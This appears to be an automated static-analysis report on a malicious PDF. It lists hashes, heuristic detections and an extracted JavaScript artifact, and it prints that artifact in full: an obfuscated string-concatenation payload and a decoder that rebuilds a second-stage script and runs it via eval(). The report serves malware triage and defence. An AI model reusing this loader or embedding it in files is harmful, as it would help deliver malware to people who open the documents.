Malicious PDF — malware analysis report

Static analysis result for SHA-256 58a032fbce3cd510…

MALICIOUS

PDF

6.5 KB | Created: 2008-31-20 53:85:00 (value as stored in the document metadata; it is not a valid calendar date/time, so the creation timestamp should be treated as unreliable) | Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) | First seen: 2026-05-08
MD5: 57f1b48fcfb6dd1e53a49a888fe3fbcf SHA-1: b5899dc12d4cc9a73167489a7ba6191b3e5584ff SHA-256: 58a032fbce3cd51061e187445bb81ab364b435701b959564e26ef6b904dbf8b8
Risk score: 166

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript that uses multiple obfuscation techniques, including string concatenation and eval(). The heuristic hits for PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL indicate that this script is intended to be executed. The obfuscation and the final eval() of a runtime-decoded string strongly suggest the script is a loader for a second stage, a common malware-delivery tactic; note that the decoded stage itself is not shown in this preview, so its exact behavior (such as downloading or executing a further payload) is inferred rather than observed. The extracted artifact 'javascript_obj0013_001.js' (SHA-256 listed under Extracted artifacts) is included as an IOC.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action — severity: low — 2 related findings — PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster — severity: critical — PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    stream
    var datfield = 'jKcJ6n5z3'+'G'+'C'+'_s'+'Y'+'K0U'+'xKWSz0R9'+'mSzKM'+'mSU'+'mSzKMmSUmSzKMmSUmSz'+'S'+'1CnXzS'+'zUMf'+'SXzSzC181MmSzxsb1MmSzxsmffmSz'+'cnefUmSzcPm'+'SUmSzcP4nb'+'zS'+'zcB'+'mfs'+'mSz4'+'nCnZzSz4n4n4'+'zSzxieS4zSzrn'+'JSczSzcn'+'Cn'+'4zSzCWfn4zS'+'z'+'cxf'+'14zS'+'z'+'M14'+'SK'+'mS'+'zKibnUmS'+'zM14SKmSzCmCnR'+'mSz'+'cn'+'JfUmSzcnCn'+'XzSz'+'CWfn4zSzXjmf'+'U'+'mSzCf'+'mURmSzcSf1'+'fmSzS3mfU'+'mSz'+'cnCff'+'mS'+'zcn'+'Cn4zSzbS4'+'S'+'CmSz'+'XjfnX'+'zSzR3'+'mURmSzCmfff'+'mSzS3fnfmSzc …
    endstream
  • Embedded JS stream — severity: low — PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact — severity: medium — EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x391 | 5069 bytes
SHA-256: 3075e011fd8077655856e561f1df2d7e430e7b68a1a1b263428b6b7c7dcfbdef
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s). 179 of 210 identifiers look randomly generated (e.g. 'zSzSmCnZzSzSmCnZzSzSMbSZzSzXzfnXzSzCWb1Z'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var datfield = 'jKcJ6n5z3'+'G'+'C'+'_s'+'Y'+'K0U'+'xKWSz0R9'+'mSzKM'+'mSU'+'mSzKMmSUmSzKMmSUmSz'+'S'+'1CnXzS'+'zUMf'+'SXzSzC181MmSzxsb1MmSzxsmffmSz'+'cnefUmSzcPm'+'SUmSzcP4nb'+'zS'+'zcB'+'mfs'+'mSz4'+'nCnZzSz4n4n4'+'zSzxieS4zSzrn'+'JSczSzcn'+'Cn'+'4zSzCWfn4zS'+'z'+'cxf'+'14zS'+'z'+'M14'+'SK'+'mS'+'zKibnUmS'+'zM14SKmSzCmCnR'+'mSz'+'cn'+'JfUmSzcnCn'+'XzSz'+'CWfn4zSzXjmf'+'U'+'mSzCf'+'mURmSzcSf1'+'fmSzS3mfU'+'mSz'+'cnCff'+'mS'+'zcn'+'Cn4zSzbS4'+'S'+'CmSz'+'XjfnX'+'zSzR3'+'mURmSzCmfff'+'mSzS3fnfmSzcn'+'Cf4zSzcnCn4'+'z'+'Sz'+'bS4SCm'+'Sz'+'XjfnRm'+'SzZSJURm'+'SzfsfS4z'+'SzS3bfrzSzcnJfrzSz'+'cnCn4zSz'+'bS4SCmSzXjfnU'+'mSzSsmURmSzS'+'14ff'+'mSzS3mU4zSzc'+'nefXzSzcnCn4zSzbS4SC'+'mSz'+'Xj'+'bn4zSz_mJURmSzSfCUCmSzS3fSRmSzcn4fMmS'+'zcnCn4zSzbS4SCmSzbn4n'+'XzSzrGbS4zS'+'zM'+'f4fZzSzC1ff'+'smSz4'+'Gf'+'1bz'+'S'+'zcBmfCmSzcnCnczSz'+'XS'+'fn'+'4zS'+'z'+'Mf4S'+'CmSzCW81X'+'zSzcPC1bzSzczJU'+'smSzCWb'+'1'+'CmSz4G'+'b1bzSzS3b'+'1Mm'+'Szcn4SKmSzcnCn'+'4'+'zSzx3b14zSz4zmnM'+'m'+'SzM1e1SmSzR'+'DmfRmSzcnCn4zSzC1'+'fn'+'4zSz4xf1'+'bzSz_f4'+'SKmSz_14SZ'+'zSzC1b14z'+'SzZnC1'+'bzSz'+'f'+'sm'+'U'+'RmSzcnCn4z'+'S'+'zXnCn4zSz'+'bS4SKmSzxm'+'bnXzSzXnfnrzSzXS4S'+'KmSzS3bnRmSzcnJUczS'+'zcnC'+'n4zSzbSCnZzSz_D'+'814zSzXxfn4'+'z'+'SzZ'+'SfU'+'fmSz_DmUbzSzcPC14'+'zS'+'zx'+'f'+'CURmSzcn'+'Cn4'+'zSzMfCfSmSzCW8'+'14'+'zSzcxf1bz'+'SzczJUsmSzCW'+'b1'+'CmSz4Gb1'+'bzSzbnJfRmSzcnCn4zSzx'+'mfn4zSzXG'+'fnxmSzbSCnZzS'+'zrxe1XzSzXxefKmS'+'zfsb1ZzSzZ'+'nCUbzSzXx'+'414'+'zSzbS4'+'SKmSzxmbnU'+'mSzX'+'nfnbzSzXS4SKmSzS3bnRmSzcne1ZzSzcnCn4zSzc'+'nJUs'+'mS'+'zMfCfSmSz'+'CW814zSzcGf1bzSzc0'+'JUsmSzCWb1CmSz4Gb1bzSz4nJfRmSzc'+'nCn4zSz'+'xmfn4zSz'+'CWffSmSz4n'+'C1b'+'zS'+'zcz'+'JUsmSzCWb1CmSz4Gb1bz'+'SzcnJfRmSz'+'c'+'n'+'Cn4zSzbzCn4zSz'+'X041K'+'mSzSmCnZzSzS'+'mCnZ'+'zSzSmCnZzSzSmCnZzSzSMbSZzSzXzfnXzSzCWb1ZzS'+'zSWefs'+'m'+'SzX0Cfxm'+'SzS'+'1CfSmSzCWb'+'1bzSz'+'CWmfUm'+'SzcGfU_mSz'+'XPbSKmSzXjfnU'+'mSz'+'MM4SKmSzCWmnUmSz4S'+'fUXzSzcxCURm'+'SzXjffZzSzM8bSKm'+'Szcxe1'+'4zSzrxCfZzSzbnbfCmSzKi'+'f1'+'czSz_M'+'CnZzSzrx41MmSz'+'cK
ffMmSz4n'+'CSfmS'+'zfW'+'JnsmSzcGfUXzSz_f'+'bfczSzcxCn_mSzbnC'+'f'+'rzSzfmJ'+'fKmS'+'zffm'+'nKmSzMf41fm'+'S'+'zXzmfb'+'zSzSWbSKmSz'+'Xzb'+'SKmS'+'zcxe1X'+'zSzx88f_m'+'SzcxbSKmSzCW'+'f1'+'KmSz4xb1'+'smSzUi'+'fnZzSzcP4SKmSz'+'cx4SKmSzX'+'SbfbzSz'+'_W41_mSzcnCnRmSzfiJ'+'fRmSzfs'+'fffmSzXSCfSmSzbxb1rzSz'+'bKf1_m'+'SzcnC1fmSzR'+'WbS'+'xm'+'SzRs8SK'+'mSz_1efbzSzC14f4zS'+'zCM'+'4SczSz'+'C'+'WeSMmS'+'zRM8SsmSzC'+'MbSMmSzC14SZzSzCm8SCmSzRM8S_m'+'SzCMbfczSzCW4S'+'4zS'+'zCM4f4zSzCfbS4zSz'+'_'+'m4SKmSzCD8'+'S'+'S'+'mSzU'+'1eSSm'+'SzCWbSM'+'m'+'SzUW8f'+'rzSzU'+'W8f_m'+'SzRMbfCmSz'+'C'+'MeSSmSzU18frzS'+'zSs8fMiSRA1sW_KSzS8CkKxrSSzR_s'+'YK0UxKWSz0R9mSzSfJfbzSzSfJfbPS'+'R'+'A1sW_K'+'z'+'kjjfm'+'CG4Sjqo'+'0ii'+'mfA'+'1sW_KToHxKo2PrWZGr'+'3iDW3MfczHnm320B'+'RjKcJ6n5z3G'+'4Cn'+'zr'+'Jo0Wo'+'A3Wo3rK0GmW'+'fQjWzknmmDYzJ'+'WYB0KB0_L'+'G'+'eW3'+'qHW9'+'xe06jSzS8C'+'kKxrSSz5RimWfQjWzknmmDvbzmPWsV'+'Y'+'KW'+'FSrWr081fW'+'rGmzC_sKfV'+'M0'+'DWCssGtM'+'sz9xWz_jrJ'+'oBzfnuBnkjrg9PB1o'+'PRRA1sW_Kj1fsWGmTrgEq'+'HW@xR_sKf'+'V'+'M0DWCssGtMsz9xWz_jrJoBzfn'+'mW'+'f'+'QjWzknmmD'+'Yz'+'JWYB0KBKCLGeW'+'3qHW'+'9xe06jjURBKonz0RZSm'+'m'+'BSKJ2q4g9Be3tcK0tG0zGvToHxKo2P'+'rWZGr3PsmkCsmfSsfRZSmm'+'B'+'SKJ2q4g9Be3iMCfS0RW1qHV2P0VIvj1f'+'s'+'WGmT'+'rgEqHW@x5RVYKWFSrWr081fWrG'+'mzeUCSrmzpJ'+'k6P0G'+'0Ko3MfeGZxC_tzBzzf4m_'+'SKkG8jUJ@rmG1J'+'VYGsgxG'+'DnXK5WVjC_Sab'+'n@re'+'zaBDzHPJ3k@'+'KVPfbfSs8'+'U4B'+'JtRjok'+'RG41jxBJQ'+'vjR3actxPHWB003jjf15'+'xe1OnJVY'+'GsgxGDnXK'+'5WVjCLiMCf'+'S0'+'RW1q'+'HV2P0VIvz3SYr3e'+'G'+'soHTczm'+'PW'+'smGDS3YrfMxc3vTff_8fUM8fUM8fUM8fUM8'+'fUM8fUMD'+'mU'+'xDmUxD'+'mUxDmUxDmUxDmU'+'xDmUx'+'DmUxDmUx'+'DmUx'+'DmUxDmUxDmUxDmUxD'+'mUxDmU'+'xDmUxDmUx'+'DmUxD'+'mU'+'xDmUxDmUxDmUxDmUxDmUxDmUxDm'+'U'+'x'+'DmU'+'xDmUxDmUxDmUx'+'D'+'mUxDmUxDmUxD'+'mUxD'+'mUx'+'DmUxDmU'+'xDmUxDmUxDmUxDmUxDmUxDmUxDmUx'+'DmUxDmUxD'+'mUxDmUxDmUxDm'+'UxDmU'+'xDmUxDmUx'+'DmU'+'xDmUxDmUxDmUx'+'DmUxDmUxDm'+'UxDmUx'+'Dm'+'UxDmUxDmUxDmUxDmUxD'+'mUxDmUxDmUxDmUxDmUxDmUxDmUxD'+'m'+'UxDmU'+'xDmUxDmUxDmUxDm'+'UxDmUxDmUxDmUxDm'
+'UxDmUxDmUxDm'+'UxDmUxDmUxD'+'mUxDmUxDmU'+'xafz'+'Kj0Jtscm3Y0'+'zJBTsWWfSSsmfJPzCmGDS3YrfMxc3vjjU'; function eoaOVMeajWt0(BC08TV4){ var tp = '63@54@1@50@29@12@9@16@10@57@0@0@0@0@0@0@19@32@15@45@14@17@20@51@28@8@61@47@49@34@37@0@39@18@44@43@27@40@52@62@25@23@24@0@0@0@0@41@0@2@26@30@21@13@42@48@33@38@11@56@5@58@55@60@22@7@31@46@53@6@3@36@35@4@59'; var qSO4Q=0, DzIfPuTh2=BC08TV4.length, AqepM2Twk=1024, vtb56lBZHEbkE, gdptLrxmh, w5d62O6rIh='', fS8xjMZU=qSO4Q, uuEJnaBlM=qSO4Q, rxw23xP9=qSO4Q, Gpm6It43GdWr=Array(); Gpm6It43GdWr = tp.split('@'); for(eval('gdptLrxmh=Ma'+'th.'+'ce'+'il(DzIfPuTh2'+'/AqepM2Twk)');gdptLrxmh>qSO4Q;gdptLrxmh--){ for(eval('vtb56lBZHEbkE=M'+'ath'+'.m'+'in(DzIfPuTh2,'+'AqepM2Twk)');vtb56lBZHEbkE>qSO4Q;vtb56lBZHEbkE--,DzIfPuTh2--){ eval('rxw23xP9|'+'=(Gpm6It43GdWr['+'BC08TV4.'+'cha'+'rCo'+'de'+'At(fS8xjMZU+'+'+)-48])<'+'<uuEJnaBlM'); if(uuEJnaBlM){ eval('w5d62O6rIh+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](155^'+'rxw23xP9&'+'25'+'5)'); rxw23xP9>>=8; uuEJnaBlM-=2; } else { uuEJnaBlM=6; } } } eval(w5d62O6rIh); } eoaOVMeajWt0(datfield);